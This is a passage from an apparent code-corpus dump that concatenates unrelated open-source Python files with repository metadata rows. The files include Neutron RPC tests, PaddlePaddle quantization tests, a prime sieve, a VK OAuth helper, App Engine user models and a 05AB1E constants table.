    order_ = order(g.security, -100)
    g.__manager.execute(order_)
    # Cancel the order
    g.__manager.cancel(order_)
| Pyangs/ShiPanE-Python-SDK | examples/joinquant/simple_strategy.py | Python | mit | 911 | 0.001473 |
# Copyright (c) 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
import testtools
from neutron.api.rpc.callbacks import resources
from neutron.api.rpc.handlers import resources_rpc
from neutron.common import topics
from neutron import context
from neutron.objects import base as objects_base
from neutron.tests import base
def _create_test_dict():
return {'id': 'uuid',
'field': 'foo'}
def _create_test_resource(context=None):
    """Build a FakeResource populated from the canonical test dict,
    with its change tracking reset (i.e. no fields marked dirty)."""
    obj = FakeResource(context, **_create_test_dict())
    obj.obj_reset_changes()
    return obj
@obj_base.VersionedObjectRegistry.register
class FakeResource(objects_base.NeutronObject):
    """Minimal NeutronObject used as the resource type under test."""

    # Only the two fields needed by the RPC serialization tests.
    fields = {
        'id': obj_fields.UUIDField(),
        'field': obj_fields.StringField()
    }

    @classmethod
    def get_objects(cls, context, **kwargs):
        # No backing store in tests; always report an empty result set.
        return list()
class ResourcesRpcBaseTestCase(base.BaseTestCase):
    """Common fixture: provides an admin context for the RPC tests below."""

    def setUp(self):
        super(ResourcesRpcBaseTestCase, self).setUp()
        self.context = context.get_admin_context()
class _ValidateResourceTypeTestCase(base.BaseTestCase):
    """Tests for the private _validate_resource_type helper."""

    def setUp(self):
        super(_ValidateResourceTypeTestCase, self).setUp()
        # Stub out the registry lookup so each test controls validity.
        self.is_valid_mock = mock.patch.object(
            resources_rpc.resources, 'is_valid_resource_type').start()

    def test_valid_type(self):
        self.is_valid_mock.return_value = True
        # Must not raise for a registered resource type.
        resources_rpc._validate_resource_type('foo')

    def test_invalid_type(self):
        self.is_valid_mock.return_value = False
        with testtools.ExpectedException(
                resources_rpc.InvalidResourceTypeClass):
            resources_rpc._validate_resource_type('foo')
class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase):
    """Tests for the versioned topic-name builder."""

    @mock.patch.object(resources_rpc, '_validate_resource_type')
    def test_resource_type_versioned_topic(self, validate_mock):
        obj_name = FakeResource.obj_name()
        # The topic embeds both the resource type and its object version.
        expected = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': 'FakeResource', 'version': '1.0'}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = resources_rpc.resource_type_versioned_topic(obj_name)
        self.assertEqual(expected, observed)
class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase):
    """Tests for the client-side (consumer) pull API."""

    def setUp(self):
        super(ResourcesPullRpcApiTestCase, self).setUp()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls',
                   return_value=FakeResource).start()
        self.rpc = resources_rpc.ResourcesPullRpcApi()
        mock.patch.object(self.rpc, 'client').start()
        self.cctxt_mock = self.rpc.client.prepare.return_value

    def test_is_singleton(self):
        # The API class caches a single instance per process.
        self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi())

    def test_pull(self):
        expected_obj = _create_test_resource(self.context)
        resource_id = expected_obj.id
        # The remote side returns a primitive; pull() must rehydrate it.
        self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive()
        result = self.rpc.pull(
            self.context, FakeResource.obj_name(), resource_id)
        self.cctxt_mock.call.assert_called_once_with(
            self.context, 'pull', resource_type='FakeResource',
            version=FakeResource.VERSION, resource_id=resource_id)
        self.assertEqual(expected_obj, result)

    def test_pull_resource_not_found(self):
        resource_dict = _create_test_dict()
        resource_id = resource_dict['id']
        # A None reply from the server must map to ResourceNotFound.
        self.cctxt_mock.call.return_value = None
        with testtools.ExpectedException(resources_rpc.ResourceNotFound):
            self.rpc.pull(self.context, FakeResource.obj_name(),
                          resource_id)
class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase):
    """Tests for the server-side pull callback (serialization, backports)."""

    def setUp(self):
        super(ResourcesPullRpcCallbackTestCase, self).setUp()
        self.callbacks = resources_rpc.ResourcesPullRpcCallback()
        self.resource_obj = _create_test_resource(self.context)

    def test_pull(self):
        resource_dict = _create_test_dict()
        with mock.patch.object(
                resources_rpc.prod_registry, 'pull',
                return_value=self.resource_obj) as registry_mock:
            primitive = self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
        registry_mock.assert_called_once_with(
            'FakeResource', self.resource_obj.id, context=self.context)
        self.assertEqual(resource_dict,
                         primitive['versioned_object.data'])
        self.assertEqual(self.resource_obj.obj_to_primitive(), primitive)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_no_backport_for_latest_version(self, to_prim_mock):
        # Requesting the current object version must not trigger a backport.
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version=None)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_backports_to_older_version(self, to_prim_mock):
        # Older requested versions are handed down for object backporting.
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version='0.9',  # less than initial version 1.0
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version='0.9')
class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase):
    """Tests for the producer-side push API (fanout casts to consumers)."""

    def setUp(self):
        super(ResourcesPushRpcApiTestCase, self).setUp()
        mock.patch.object(resources_rpc.n_rpc, 'get_client').start()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        self.rpc = resources_rpc.ResourcesPushRpcApi()
        self.cctxt_mock = self.rpc.client.prepare.return_value
        self.resource_obj = _create_test_resource(self.context)

    def test__prepare_object_fanout_context(self):
        # The fanout context must target the type+version specific topic.
        expected_topic = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': resources.get_resource_type(self.resource_obj),
            'version': self.resource_obj.VERSION}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = self.rpc._prepare_object_fanout_context(
                self.resource_obj)
        self.rpc.client.prepare.assert_called_once_with(
            fanout=True, topic=expected_topic)
        self.assertEqual(self.cctxt_mock, observed)

    # NOTE(review): 'test_pushy' looks like a typo for 'test_push', but
    # renaming would change the discovered test id, so it is left as-is.
    def test_pushy(self):
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            self.rpc.push(
                self.context, self.resource_obj, 'TYPE')
        self.cctxt_mock.cast.assert_called_once_with(
            self.context, 'push',
            resource=self.resource_obj.obj_to_primitive(),
            event_type='TYPE')
class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase):
    """Tests for the consumer-side push callback."""

    def setUp(self):
        super(ResourcesPushRpcCallbackTestCase, self).setUp()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        mock.patch.object(
            resources_rpc.resources,
            'get_resource_cls', return_value=FakeResource).start()
        self.resource_obj = _create_test_resource(self.context)
        self.resource_prim = self.resource_obj.obj_to_primitive()
        self.callbacks = resources_rpc.ResourcesPushRpcCallback()

    @mock.patch.object(resources_rpc.cons_registry, 'push')
    def test_push(self, reg_push_mock):
        # The primitive must be rehydrated into a full object before
        # being handed to the consumer registry.
        self.callbacks.push(self.context, self.resource_prim, 'TYPE')
        reg_push_mock.assert_called_once_with(self.resource_obj.obj_name(),
                                              self.resource_obj, 'TYPE')
| javaos74/neutron | neutron/tests/unit/api/rpc/handlers/test_resources_rpc.py | Python | apache-2.0 | 8,869 | 0.000338 |
#!/usr/bin/env python
# Paths to the example train/test feature files (one feature vector per row).
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'

# Each entry: [train_fname, test_fname, cardinality, size_cache]
parameter_list = [[traindat,testdat,2,10], [traindat,testdat,5,10]]
def kernel_anova_modular (train_fname=traindat,test_fname=testdat,cardinality=2, size_cache=10):
	"""Compute ANOVA kernel matrices with shogun.

	Returns (km_train, km_test, kernel): the train/train kernel matrix,
	the train/test kernel matrix and the kernel object itself.
	"""
	from modshogun import ANOVAKernel,RealFeatures,CSVFile
	feats_train=RealFeatures(CSVFile(train_fname))
	feats_test=RealFeatures(CSVFile(test_fname))

	# Kernel over the training features with the given ANOVA cardinality.
	kernel=ANOVAKernel(feats_train, feats_train, cardinality, size_cache)
	km_train=kernel.get_kernel_matrix()

	# Re-initialise against the test features for the cross kernel.
	kernel.init(feats_train, feats_test)
	km_test=kernel.get_kernel_matrix()
	return km_train, km_test, kernel
# Run the first parameter set when executed as a script.
if __name__=='__main__':
	print('ANOVA')
	kernel_anova_modular(*parameter_list[0])
| c4goldsw/shogun | examples/undocumented/python_modular/kernel_anova_modular.py | Python | gpl-3.0 | 717 | 0.041841 |
from math import sqrt
def sieve_primes(n):
    """Return all primes <= n using the Sieve of Eratosthenes.

    O(n log log n) time, O(n) space.  Returns an empty list for n < 2;
    the original monolithic code raised IndexError for n == 0 because it
    unconditionally indexed boolArr[1].
    """
    if n < 2:
        return []
    # [True] * k instead of a comprehension with an unused loop variable.
    is_prime = [True] * (n + 1)
    is_prime[0] = is_prime[1] = False
    for i in range(2, int(sqrt(n)) + 1):
        if is_prime[i]:
            # Start at i*i: smaller multiples were marked by smaller primes.
            for j in range(i * i, n + 1, i):
                is_prime[j] = False
    return [i for i in range(2, n + 1) if is_prime[i]]


def main():
    """Read n from stdin and print every prime <= n, one per line."""
    n = int(input("Enter n : "))
    for p in sieve_primes(n):
        print(p)


if __name__ == '__main__':
    main()
| vansjyo/Hacktoberfest-2k17 | DhvanilP/sieve_of_erastothenes.py | Python | mit | 457 | 0 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle.fluid.core as core
class TestFakeQuantizeOp(OpTest):
    """Checks fake_quantize_abs_max against a NumPy reference."""

    def setUp(self):
        self.op_type = "fake_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        self.inputs = {'X': np.random.random((124, 240)).astype("float32"), }
        # The scale is the absolute maximum over the whole tensor.
        scale = np.max(np.abs(self.inputs['X'])).astype("float32")
        self.outputs = {
            'Out': np.round(self.inputs['X'] / scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1)),
            'OutScale': np.array(scale).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()
class TestFakeChannelWiseQuantizeOp(OpTest):
    """Checks fake_channel_wise_quantize_abs_max against a NumPy reference.

    The quantization scale is computed independently for each output
    channel (axis 0 of X).
    """

    def setUp(self):
        self.op_type = "fake_channel_wise_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        self.inputs = {
            'X': np.random.random((4, 3, 64, 64)).astype("float32"),
        }
        # Per-channel absolute-max scales (comprehension instead of the
        # original index-and-append loop).
        scales = [np.max(np.abs(channel)).astype("float32")
                  for channel in self.inputs['X']]
        # Hoist the loop-invariant quantization range, e.g. 127 for 8 bits.
        bnt = (1 << (self.attrs['bit_length'] - 1)) - 1
        outputs = self.inputs['X'].copy()
        for i, scale in enumerate(scales):
            outputs[i] = np.round(outputs[i] / scale * bnt)
        self.outputs = {
            'Out': outputs,
            'OutScale': np.array(scales).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeRangeAbsMaxOp(OpTest):
    """fake_quantize_range_abs_max in training mode (is_test=False).

    In training the scale is taken from the current batch's max-abs
    value and recorded in the scale window.
    """

    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'window_size': int(1),
            'is_test': False
        }
        x = ((np.random.random((8, 16, 7, 7)) - 0.5) * 10).astype("float32")
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': np.zeros(1).astype("float32")
        }
        scale = np.max(np.abs(x)).astype("float32")
        bnt = (1 << (self.attrs['bit_length'] - 1)) - 1
        # The scale window holds the per-iteration scales; slot 0 gets
        # this batch's scale.
        window_scales = np.zeros(self.attrs['window_size']).astype("float32")
        window_scales[0] = scale
        self.outputs = {
            'Out': np.round(x / scale * bnt),
            'OutScale': scale,
            'OutScales': window_scales,
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeMovingOp(OpTest):
    """fake_quantize_moving_average_abs_max against a NumPy reference.

    The moving-average update implemented here is:
        accum' = rate * accum + max(|X|)
        state' = rate * state + 1
        scale' = accum' / state'
    """

    def setUp(self):
        self.op_type = "fake_quantize_moving_average_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'moving_rate': float(0.9),
            'is_test': False
        }
        # Prior moving-average state: accumulator and step counter start
        # at 1, previous scale at 0.001.
        accum = np.ones(1).astype("float32")
        state = np.ones(1).astype("float32")
        scale = np.zeros(1).astype("float32")
        scale[0] = 0.001
        self.inputs = {
            'X': np.random.random((8, 16, 7, 7)).astype("float32"),
            'InScale': scale,
            'InAccum': accum,
            'InState': state,
        }
        out_accum = np.zeros(1).astype("float32")
        out_state = np.zeros(1).astype("float32")
        out_accum[0] = self.attrs['moving_rate'] * accum[0] + np.max(
            np.abs(self.inputs['X'])).astype("float32")
        out_state[0] = self.attrs['moving_rate'] * state[0] + 1
        # NOTE: the original code initialized out_scale with np.zeros(1)
        # and immediately rebound it here — the dead initialization is
        # removed.
        out_scale = out_accum / out_state
        self.outputs = {
            'Out': np.round(self.inputs['X'] / out_scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1)),
            'OutAccum': out_accum,
            'OutState': out_state,
            'OutScale': out_scale,
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeRangeAbsMaxOp2(OpTest):
    """fake_quantize_range_abs_max in inference mode (is_test=True).

    In inference the op clips X into [-InScale, InScale] before
    quantizing; the scale outputs are excluded from the check.
    """

    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(8),
            'window_size': int(1),
            'is_test': True
        }
        x = ((np.random.random((8, 16, 7, 7)) - 0.5) * 10).astype("float32")
        # Deliberately smaller than max(|x|) so clipping actually occurs.
        scale = np.max(np.abs(x)).astype("float32") - 1.0
        window_scales = np.zeros(self.attrs['window_size']).astype("float32")
        window_scales[0] = scale
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': scale.astype("float32")
        }
        bnt = (1 << (self.attrs['bit_length'] - 1)) - 1
        clipped = np.clip(x, -scale, scale)
        self.outputs = {
            'Out': np.round(clipped / scale * bnt),
            'OutScale': scale.astype("float32"),
            'OutScales': window_scales,
        }

    def test_check_output(self):
        self.check_output(no_check_set=set(['OutScale', 'OutScales']))
# Run the fake-quantize op tests when executed as a script.
if __name__ == "__main__":
    unittest.main()
| baidu/Paddle | python/paddle/fluid/tests/unittests/test_fake_quantize_op.py | Python | apache-2.0 | 5,508 | 0.000182 |
# vkapi.py
#
# Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import requests
import sys
class vkapi(object):
    """Minimal helper for VK's OAuth implicit-flow authorization.

    Builds and issues the request to https://oauth.vk.com/authorize.
    Example authorize URL the request corresponds to:

        https://oauth.vk.com/authorize?
        client_id=1&display=page&redirect_uri=http://example.com/callback
        &scope=friends&response_type=token&v=5.57&state=123456
    """

    redirect_url = ''
    # Requested access-rights bitmask ("Разрешение прав доступа").
    # Original line `scope = 0 '''...'''` was a syntax error.
    scope = 0
    access_token = ''
    # Original line `client_id =` had no right-hand side (syntax error).
    client_id = None

    def __init__(self, _ci, _ru, _scope):
        """Store client id, redirect URL and scope for later requests."""
        # Original used `==` (a no-op comparison) instead of assignment.
        self.redirect_url = _ru
        self.scope = _scope
        self.client_id = _ci

    def auth(self, login, passwd):
        """Request the authorization page; return the Response, or None
        on a network error.

        NOTE(review): `login`/`passwd` are accepted but unused by the
        implicit flow request — confirm intent. Original signature was
        missing `self`, and `params` was never created before being
        indexed.
        """
        url = "https://oauth.vk.com/authorize"
        params = {
            "client_id": self.client_id,
            "display": "mobile",
            # Original misspelled the key as "redirecct_url"; VK's API
            # expects "redirect_uri".
            "redirect_uri": self.redirect_url,
            "scope": self.scope,
            "response_type": "token",
        }
        try:
            return requests.get(url, params)
        except requests.RequestException:
            # The source was truncated at `except requests.`;
            # RequestException is the base of all requests errors —
            # TODO confirm the intended handling.
            return None
| enep/vkbot | vkbot/vkapi.py | Python | gpl-3.0 | 1,581 | 0.033333 |
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import ndb
class User(User):
    """
    Universal user model. Can be used with App Engine's default users API,
    own auth or third party authentication methods (OpenID, OAuth etc).
    based on https://gist.github.com/kylefinley
    """

    #: Creation date.
    created = ndb.DateTimeProperty(auto_now_add=True)
    #: Modification date.
    updated = ndb.DateTimeProperty(auto_now=True)
    #: User defined unique name, also used as key_name.
    # Not used by OpenID
    username = ndb.StringProperty()
    #: User Name
    name = ndb.StringProperty()
    #: User Last Name
    last_name = ndb.StringProperty()
    #: User email
    email = ndb.StringProperty()
    #: Hashed password. Only set for own authentication.
    # Not required because third party authentication
    # doesn't use password.
    password = ndb.StringProperty()
    #: User Country
    country = ndb.StringProperty()
    #: User TimeZone
    tz = ndb.StringProperty()
    #: Account activation verifies email
    activated = ndb.BooleanProperty(default=False)

    @classmethod
    def get_by_email(cls, email):
        """Return the first user whose email matches, or None."""
        return cls.query(cls.email == email).get()

    @classmethod
    def create_resend_token(cls, user_id):
        """Mint a token used to resend the activation e-mail."""
        token_entity = cls.token_model.create(user_id, 'resend-activation-mail')
        return token_entity.token

    @classmethod
    def validate_resend_token(cls, user_id, token):
        """Check that a resend-activation token is valid for user_id."""
        return cls.validate_token(user_id, 'resend-activation-mail', token)

    @classmethod
    def delete_resend_token(cls, user_id, token):
        """Remove a previously issued resend-activation token."""
        cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete()

    def get_social_providers_names(self):
        """Names of the social providers linked to this account."""
        linked_accounts = SocialUser.get_by_user(self.key)
        return [account.provider for account in linked_accounts]

    def get_social_providers_info(self):
        """Split PROVIDERS_INFO into providers this user uses / doesn't."""
        used_names = self.get_social_providers_names()
        info = {'used': [], 'unused': []}
        for provider_name, details in SocialUser.PROVIDERS_INFO.items():
            bucket = 'used' if provider_name in used_names else 'unused'
            info[bucket].append(details)
        return info
class LogVisit(ndb.Model):
    """Audit record of a single site visit."""
    # Key of the visiting user entity.
    user = ndb.KeyProperty(kind=User)
    # Browser user-agent string.
    uastring = ndb.StringProperty()
    # Client IP address.
    ip = ndb.StringProperty()
    # Visit time; stored as a string (not a DateTimeProperty).
    timestamp = ndb.StringProperty()
class LogEmail(ndb.Model):
    """Audit record of an outgoing e-mail."""
    # Sender address (required).
    sender = ndb.StringProperty(
        required=True)
    # Recipient address (required).
    to = ndb.StringProperty(
        required=True)
    # Subject line (required).
    subject = ndb.StringProperty(
        required=True)
    # Message body.
    body = ndb.TextProperty()
    # Send time; auto_now_add is not set, so the caller supplies it.
    when = ndb.DateTimeProperty()
class SocialUser(ndb.Model):
    """Link between a User entity and a third-party auth provider."""

    PROVIDERS_INFO = { # uri is for OpenID only (not OAuth)
        'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'},
        #'github': {'name': 'github', 'label': 'Github', 'uri': ''},
        #'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''},
        #'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''},
        #'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'},
        #'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''},
        #'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'},
    }

    # Key of the owning User entity.
    user = ndb.KeyProperty(kind=User)
    provider = ndb.StringProperty()
    uid = ndb.StringProperty()
    extra_data = ndb.JsonProperty()

    @classmethod
    def get_by_user(cls, user):
        """All social links for the given user key."""
        return cls.query(cls.user == user).fetch()

    @classmethod
    def get_by_user_and_provider(cls, user, provider):
        """The link for (user, provider), or None."""
        return cls.query(cls.user == user, cls.provider == provider).get()

    @classmethod
    def get_by_provider_and_uid(cls, provider, uid):
        """The link for (provider, uid), or None."""
        return cls.query(cls.provider == provider, cls.uid == uid).get()

    @classmethod
    def check_unique_uid(cls, provider, uid):
        """True iff the pair (provider, uid) is not taken yet."""
        return cls.get_by_provider_and_uid(provider, uid) is None

    @classmethod
    def check_unique_user(cls, provider, user):
        """True iff the pair (user, provider) is not taken yet."""
        return cls.get_by_user_and_provider(user, provider) is None

    @classmethod
    def check_unique(cls, user, provider, uid):
        """True iff both (provider, uid) and (user, provider) are free."""
        return cls.check_unique_uid(provider, uid) and cls.check_unique_user(provider, user)

    @staticmethod
    def open_id_providers():
        """Provider names that support OpenID (non-empty 'uri')."""
        return [name for name, info in SocialUser.PROVIDERS_INFO.items() if info['uri']]
| mats116/ElasticBigQuery | boilerplate/models.py | Python | lgpl-3.0 | 5,145 | 0.003304 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_move_line
import account_move_reconcile
import cash_flow_type
import cash_flow_distribution
import report
import wizard | sysadminmatmoz/odoo-clearcorp | TODO-8.0/cash_flow_report/__init__.py | Python | agpl-3.0 | 1,165 | 0.000858 |
import datetime
import math
class MethodAttribute:
    """Pairs a callable with its arity for easy tuple-like access.

    ``method`` is the implementation of a command and ``arity`` is the
    number of arguments it expects.
    """

    def __init__(self, method, arity):
        self.method, self.arity = method, arity
# Mapping from 05AB1E constant-command token to its MethodAttribute.
# Arity-0 entries push a fixed value (current date/time fields, alphabets,
# powers of two, ...); the arity-1 entries (žs, žt) slice the digit
# strings `constant_pi` / `constant_e` defined later in this module.
constants = {
    "ža": MethodAttribute(
        lambda: int(datetime.datetime.now().hour),
        arity=0
    ),
    "žb": MethodAttribute(
        lambda: int(datetime.datetime.now().minute),
        arity=0
    ),
    "žc": MethodAttribute(
        lambda: int(datetime.datetime.now().second),
        arity=0
    ),
    "žd": MethodAttribute(
        lambda: int(datetime.datetime.now().microsecond),
        arity=0
    ),
    "že": MethodAttribute(
        lambda: int(datetime.datetime.now().day),
        arity=0
    ),
    "žf": MethodAttribute(
        lambda: int(datetime.datetime.now().month),
        arity=0
    ),
    "žg": MethodAttribute(
        lambda: int(datetime.datetime.now().year),
        arity=0
    ),
    "žh": MethodAttribute(
        lambda: "0123456789",
        arity=0
    ),
    "ži": MethodAttribute(
        lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
        arity=0
    ),
    "žj": MethodAttribute(
        lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_",
        arity=0
    ),
    "žk": MethodAttribute(
        lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA",
        arity=0
    ),
    "žl": MethodAttribute(
        lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210_",
        arity=0
    ),
    "žm": MethodAttribute(
        lambda: "9876543210",
        arity=0
    ),
    "žn": MethodAttribute(
        lambda: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
        arity=0
    ),
    "žo": MethodAttribute(
        lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba",
        arity=0
    ),
    "žp": MethodAttribute(
        lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBA",
        arity=0
    ),
    "žq": MethodAttribute(
        lambda: math.pi,
        arity=0
    ),
    "žr": MethodAttribute(
        lambda: math.e,
        arity=0
    ),
    # žs / žt take one argument (a digit count) and slice the pi / e
    # digit strings defined at module level below.
    "žs": MethodAttribute(
        lambda x: constant_pi[0:int(x) + 2],
        arity=1
    ),
    "žt": MethodAttribute(
        lambda x: constant_e[0:int(x) + 2],
        arity=1
    ),
    "žu": MethodAttribute(
        lambda: "()<>[]{}",
        arity=0
    ),
    # žv .. žJ: powers of two from 16 up to 2**32.
    "žv": MethodAttribute(
        lambda: 16,
        arity=0
    ),
    "žw": MethodAttribute(
        lambda: 32,
        arity=0
    ),
    "žx": MethodAttribute(
        lambda: 64,
        arity=0
    ),
    "žy": MethodAttribute(
        lambda: 128,
        arity=0
    ),
    "žz": MethodAttribute(
        lambda: 256,
        arity=0
    ),
    "žA": MethodAttribute(
        lambda: 512,
        arity=0
    ),
    "žB": MethodAttribute(
        lambda: 1024,
        arity=0
    ),
    "žC": MethodAttribute(
        lambda: 2048,
        arity=0
    ),
    "žD": MethodAttribute(
        lambda: 4096,
        arity=0
    ),
    "žE": MethodAttribute(
        lambda: 8192,
        arity=0
    ),
    "žF": MethodAttribute(
        lambda: 16384,
        arity=0
    ),
    "žG": MethodAttribute(
        lambda: 32768,
        arity=0
    ),
    "žH": MethodAttribute(
        lambda: 65536,
        arity=0
    ),
    "žI": MethodAttribute(
        lambda: 2147483648,
        arity=0
    ),
    "žJ": MethodAttribute(
        lambda: 4294967296,
        arity=0
    ),
    "žK": MethodAttribute(
        lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
        arity=0
    ),
    "žL": MethodAttribute(
        lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210",
        arity=0
    ),
    "žM": MethodAttribute(
        lambda: "aeiou",
        arity=0
    ),
    "žN": MethodAttribute(
        lambda: "bcdfghjklmnpqrstvwxyz",
        arity=0
    ),
    "žO": MethodAttribute(
        lambda: "aeiouy",
        arity=0
    ),
    "žP": MethodAttribute(
        lambda: "bcdfghjklmnpqrstvwxz",
        arity=0
    ),
    "žQ": MethodAttribute(
        lambda: " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~",
        arity=0
    ),
    "žR": MethodAttribute(
        lambda: "ABC",
        arity=0
    ),
    # žS / žT / žU: the three QWERTY keyboard rows; žV is the rows as a
    # list, žW the rows joined.
    "žS": MethodAttribute(
        lambda: "qwertyuiop",
        arity=0
    ),
    "žT": MethodAttribute(
        lambda: "asdfghjkl",
        arity=0
    ),
    "žU": MethodAttribute(
        lambda: "zxcvbnm",
        arity=0
    ),
    "žV": MethodAttribute(
        lambda: ["qwertyuiop", "asdfghjkl", "zxcvbnm"],
        arity=0
    ),
    "žW": MethodAttribute(
        lambda: "qwertyuiopasdfghjklzxcvbnm",
        arity=0
    ),
    # NOTE(review): žX returns the same value as žW — confirm this
    # duplication is intended.
    "žX": MethodAttribute(
        lambda: "qwertyuiopasdfghjklzxcvbnm",
        arity=0
    ),
    "т": MethodAttribute(
        lambda: 100,
        arity=0
    ),
    "₁": MethodAttribute(
        lambda: 256,
        arity=0
    ),
    "₂": MethodAttribute(
        lambda: 26,
        arity=0
    ),
    "₃": MethodAttribute(
        lambda: 95,
        arity=0
    ),
    "₄": MethodAttribute(
        lambda: 1000,
        arity=0
    )
}
class ConstantsInvoker:
    """Dispatches 05AB1E constant-command tokens to their handlers."""

    def __init__(self):
        # Token -> MethodAttribute mapping from the module-level table.
        self.commands_list = constants

    def invoke_command(self, command, *args):
        """Run the handler registered for *command*.

        :param command: A string representation of the 05AB1E command
        :param args: Arguments forwarded to the handler's method
        :return: Whatever the handler's method returns
        """
        handler = self.commands_list.get(command)
        return handler.method(*args)
constant_pi = "3.141592653589793238462643383279502884197169399375105820974944"\
